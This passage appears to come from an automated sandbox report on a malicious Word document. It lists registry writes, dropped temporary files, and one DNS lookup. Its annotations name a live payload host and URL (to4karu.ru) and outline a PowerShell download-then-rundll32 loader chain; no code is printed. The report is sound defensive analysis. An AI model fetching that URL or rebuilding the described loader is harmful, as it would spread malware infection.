  • PID 4004 WINWORD.EXE | Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | Operation: write | Name: 1031 | Value: Off
  • PID 4004 WINWORD.EXE | Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | Operation: write | Name: 1040 | Value: Off
  • PID 4004 WINWORD.EXE | Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | Operation: write | Name: 1049 | Value: Off
  • PID 4004 WINWORD.EXE | Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | Operation: write | Name: 3082 | Value: Off
  • PID 4004 WINWORD.EXE | Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | Operation: write | Name: 1042 | Value: Off
Executable files
0
Suspicious files
10
Text files
0
Unknown types
5

Dropped files (PID | Process | Filename; the report records no type, MD5 or SHA256 for any of them)

  • 4004 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE075.tmp.cvr
  • 4004 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B85110B.wmf
  • 4004 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14799A51.wmf
  • 2792 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YXVUFUH03MR62MFWW69U.temp
  • 3972 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IJ12EM65J5F8VIJWOBUW.temp
  • 1252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G17ANFX80F87ALDM7WPA.temp
  • 3836 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N5WEAZE2I1C82AO2GURF.temp
  • 2444 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\54XSJ9AIGN7OCTH1EKXU.temp
  • 3924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6KNBW52O6K2Z1VFC52T9.temp
  • 2932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3QEO1B8JS8UGALLV4BCZ.temp

None of these is attacker content: the WINWORD.EXE entries are Word's own temporary files (a .tmp.cvr in Temp and two rendered .wmf images in Content.MSO), and the powershell.exe entries are Windows jump-list records written under Recent\CustomDestinations when a program is started through the shell. The file the decoded script writes, %USERPROFILE%\rtsuzllfbjdjl.bin, is absent because the download from to4karu.ru never completed in this run.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 1
Threats: 0

HTTP requests

No HTTP requests

Connections

No data

DNS requests (Domain | IP | Reputation)

to4karu.ru | (no IP recorded) | whitelisted

The single DNS query is for the host the decoded PowerShell payload downloads from (http://to4karu.ru/lierhgiojsgiouvbjnkfeiubg.bin). No IP was recorded and no TCP connection followed, so the download, the size check and the rundll32.exe stage never ran in this session, which is consistent with the empty MALICIOUS indicator list above despite the verdict. Treat the "whitelisted" reputation tag as a property of the sandbox's domain list, not as evidence that the domain is safe; in this sample it is the payload host.

Threats

No threats detected
No debug info